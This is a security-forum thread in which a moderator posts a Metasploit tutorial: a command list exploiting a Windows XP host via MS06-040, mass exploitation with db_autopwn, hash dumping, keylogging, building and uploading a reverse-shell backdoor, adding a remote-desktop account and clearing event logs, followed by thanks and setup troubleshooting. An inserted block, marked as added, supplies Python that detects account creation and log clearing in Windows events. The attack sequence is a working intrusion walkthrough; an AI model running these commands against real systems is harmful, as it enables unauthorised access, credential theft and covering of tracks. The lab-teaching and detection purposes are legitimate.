
Thread: [Video] Messing with Metasploit

  1. #1
    Moderator g0tmi1k
    Join Date: Feb 2010
    Posts: 1,771

    [Video] Messing with Metasploit

    Links
    Watch video online: http://g0tmi1k.blip.tv/file/3308154
    Download video: http://www.mediafire.com/?oxsal2u1dr81b0a
    What is this?
    A basic guide to show how powerful the metasploit framework is!
    >Set up & run an exploit.
    >Use nmap to scan.
    >Use db_autopwn (to exploit the masses!)
    >Gather information about the target
    >Read, download and upload files
    >Run scripts
    >Create & use a backdoor.

    What do I need?
    > Metasploit Framework
    > (Vulnerable) target (e.g. Windows XP SP0/1)


    Software
    Name: Metasploit
    Version: 3.3.3
    Home Page: http://www.metasploit.com/
    Download Link: http://www.metasploit.com/framework/download/


    Commands:
    Code:
    cd /pentest/exploits/framework3/
    ./msfconsole
    db_create g0tmi1k
    db_hosts
    db_add_host 10.0.0.4
    db_hosts
    
    #show                             ##Show everything! [wasn't in video]
    
    use windows/smb/ms06_040_netapi
    #use windows/dcerpc/ms03_026_dcom ##Different exploit, didn't find it as reliable
    
    #set payload windows/shell_bind_tcp          ##Could do a windows shell (not as powerful as meterpreter)
    #set payload windows/meterpreter/reverse_tcp ##Could do a meterpreter (but we do it later!)
    set payload windows/vncinject/bind_tcp
    show options
    set lhost 10.0.0.6
    show options
    exploit
    
    db_del_host 10.0.0.4
    db_hosts
    db_nmap -n 1O 10.0.0.1-5
    db_hosts
    
    db_autopwn -t -p -e
    
    sessions -l
    sessions -i 1
    
    sysinfo
    #ipconfig   ##IP information [wasn't in video]
    idletime
    ps
    kill [number]
    getuid
    #migrate // getsystem // use priv  ##If the exploit doesn't have system privileges! [wasn't in video]
    hashdump
    # execute                  ## Runs a command [wasn't in video]
    shell
    pwd
    ls
    cd C:/
    ls
    mkdir g0tmi1k
    ls
    cd g0tmi1k
    cat C:/boot.ini
    download C:/boot.ini /tmp/boot.ini
    ./msfpayload windows/meterpreter/reverse_tcp lhost=10.0.0.6 X > /tmp/g0tmi1k.exe
    upload /tmp/g0tmi1k.exe C:/g0tmi1k/g0tmi1k.exe
    run getgui -u g0tmi1k -p haveyou
    run keylogrecorder
    ## More scripts: /pentest/exploits/framework3/scripts/meterpreter
    #run scraper    ##Gets information about target, dumps reg etc[wasn't in video]
    #run vnc        ##Setups VNC [wasn't in video]
    #run uploadexec ##Upload and run a program [wasn't in video]
    clearev
    exit -y
    exit -y
    
    ##Start fresh for the backdoor!
    ./msfconsole
    use exploit/multi/handler
    set PAYLOAD windows/meterpreter/reverse_tcp
    set LHOST 10.0.0.6
    exploit
    
    ## Somehow run: C:\g0tmi1k\g0tmi1k.exe
    Notes:
    Made a few slip-ups in the video and something went wrong with keylogrecorder.
    This is only the basic stuff - it can do A LOT more! See commands for a few more basic things which I didn't do.

    Song: Vicky Devine - Facing The Truth
    Video length: 9:07
    Capture length: 29:20

    Blog Post: http://g0tmi1k.blogspot.com/2010/03/...etasploit.html
    Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/2346-%5Bvideo%5D-messing-metasploit.html
    Last edited by g0tmi1k; 03-05-2011 at 02:59 PM.
    Have you...g0tmi1k?
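
From the defender's side, the account creation (`run getgui -u ... -p ...`) and log clearing (`clearev`) steps in the command list above leave Windows Security events behind. The following is an added example, not part of the original post: it correlates those events per host, assuming the records were forwarded to a collector before the local log was cleared. The record fields, host names, the privileged-group check and the 10-minute window are constructed assumptions; the event IDs are the standard Windows ones.

```python
from datetime import datetime, timedelta

# Standard Windows Security event IDs: (XP/2003 ID, Vista-and-later ID).
LOG_CLEARED = {517, 1102}    # audit log was cleared
USER_CREATED = {624, 4720}   # user account created
GROUP_ADD = {636, 4732}      # member added to a security-enabled local group
PRIV_GROUPS = {"Administrators", "Remote Desktop Users"}
WINDOW = timedelta(minutes=10)  # assumed correlation window

def detect(events, window=WINDOW):
    """Return (host, finding) tuples for account-creation and log-clear patterns."""
    by_host = {}
    for ev in sorted(events, key=lambda e: e["time"]):
        by_host.setdefault(ev["host"], []).append(ev)
    findings = []
    for host, evs in by_host.items():
        created = {}  # account name -> time it was created
        for ev in evs:
            if ev["id"] in USER_CREATED:
                created[ev["target"]] = ev["time"]
            elif ev["id"] in GROUP_ADD and ev.get("group") in PRIV_GROUPS:
                t0 = created.get(ev["target"])
                if t0 is not None and ev["time"] - t0 <= window:
                    findings.append((host, f"new account {ev['target']} added to {ev['group']}"))
            elif ev["id"] in LOG_CLEARED:
                recent = sorted(a for a, t0 in created.items() if ev["time"] - t0 <= window)
                suffix = " after creating " + ",".join(recent) if recent else ""
                findings.append((host, "log cleared" + suffix))
    return findings

# Constructed sample records (simplified fields, not real log data).
T = datetime(2010, 3, 1, 12, 0, 0)
SAMPLE = [
    {"time": T, "host": "xp-lab", "id": 624, "target": "labuser"},
    {"time": T + timedelta(seconds=2), "host": "xp-lab", "id": 636,
     "target": "labuser", "group": "Administrators"},
    {"time": T + timedelta(seconds=3), "host": "xp-lab", "id": 636,
     "target": "labuser", "group": "Remote Desktop Users"},
    {"time": T + timedelta(minutes=4), "host": "xp-lab", "id": 517},
    {"time": T + timedelta(hours=5), "host": "srv-01", "id": 1102},
]

if __name__ == "__main__":
    for host, finding in detect(SAMPLE):
        print(f"{host}: {finding}")
```

A log-cleared event with no other context is still reported on its own, since on a host without forwarding it is the only record that survives the clear.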

  2. #2
    Just burned his ISO
    Join Date: Apr 2010
    Posts: 13

    Re: [Video] Messing with Metasploit

    Very Nice! I know I'm kinda late on this, but think you deserve more credit, and at least 1 reply. You help guys like me out tremendously!
    Keep the videos coming

  3. #3
    Moderator g0tmi1k
    Join Date: Feb 2010
    Posts: 1,771

    Re: [Video] Messing with Metasploit

    Thanks for the thanks (=
    Have you...g0tmi1k?

  4. #4
    Just burned his ISO
    Join Date: Jun 2010
    Posts: 7

    Re: [Video] Messing with Metasploit

    Nice video, every beginner should see this video.
    It just explains everything of the basics from metasploit.

  5. #5
    Moderator g0tmi1k
    Join Date: Feb 2010
    Posts: 1,771

    Re: [Video] Messing with Metasploit

    Quote, originally posted by errorman:
    Nice video, every beginner should see this video.
    It just explains everything of the basics from metasploit.

    Thanks for the thanks!
    That was the aim of the video! (=
    Have you...g0tmi1k?

  6. #6
    Just burned his ISO pheaneasphreak
    Join Date: Aug 2010
    Location: Germany
    Posts: 1

    Re: [Video] Messing with Metasploit

    Hi everyone. Yesterday I was trying to re-enact this scenario, but when it comes to msfconsole I got the following error.

    msf > db_create pheaneasphreak

    Warning: The db_create command is deprecated, use db_connect instead.
    The database and schema will be created automatically by db_connect. If db_connect fails
    to create the database, create it manually with your DBMS' s administration tools.

    createdb: could not connect to database postgres: could not connect to server: No such file or directory
    Is the server running locally and accepting connections to Unix domain socket
    "/var/run/postgresql/ .s.PGSQL.5432" ?
    Error while running command db_create: Failed to connect to database: could not connect to server:
    connection refused.
    Is the server running on host "127.0.01" and accepting TCP/IP connections on port 5432?


    What does that mean and how can I fix that? I am new to this Backtrack thing. Thanks in advance.


    pheaneasphreak

  7. #7
    Member
    Join Date: Feb 2010
    Posts: 50

    Re: [Video] Messing with Metasploit

    Dear sir,

    When I was typing db_create k4t41, a command like this appeared: http://i34.tinypic.com/5yaj9z.png
    Could someone tell me what the meaning was?

    tks

  8. #8
    Member
    Join Date: Feb 2010
    Posts: 50

    Re: [Video] Messing with Metasploit

    Dear sir,

    When I was typing db_create k4t41 at metasploit, a command like this appeared: http://i34.tinypic.com/5yaj9z.png

    Please tell me what I should do.

    tks

  9. #9
    Just burned his ISO
    Join Date: May 2010
    Posts: 1

    Re: [Video] Messing with Metasploit

    thanks for the video

  10. #10
    Moderator g0tmi1k
    Join Date: Feb 2010
    Posts: 1,771

    Re: [Video] Messing with Metasploit

    What version of BackTrack are you using?
    Have you got postgres installed?
    What is the output from running
    Code:
    db_driver
    ?
    *Friendly reminder - could you use CODE tags this time?!*
    Have you...g0tmi1k?
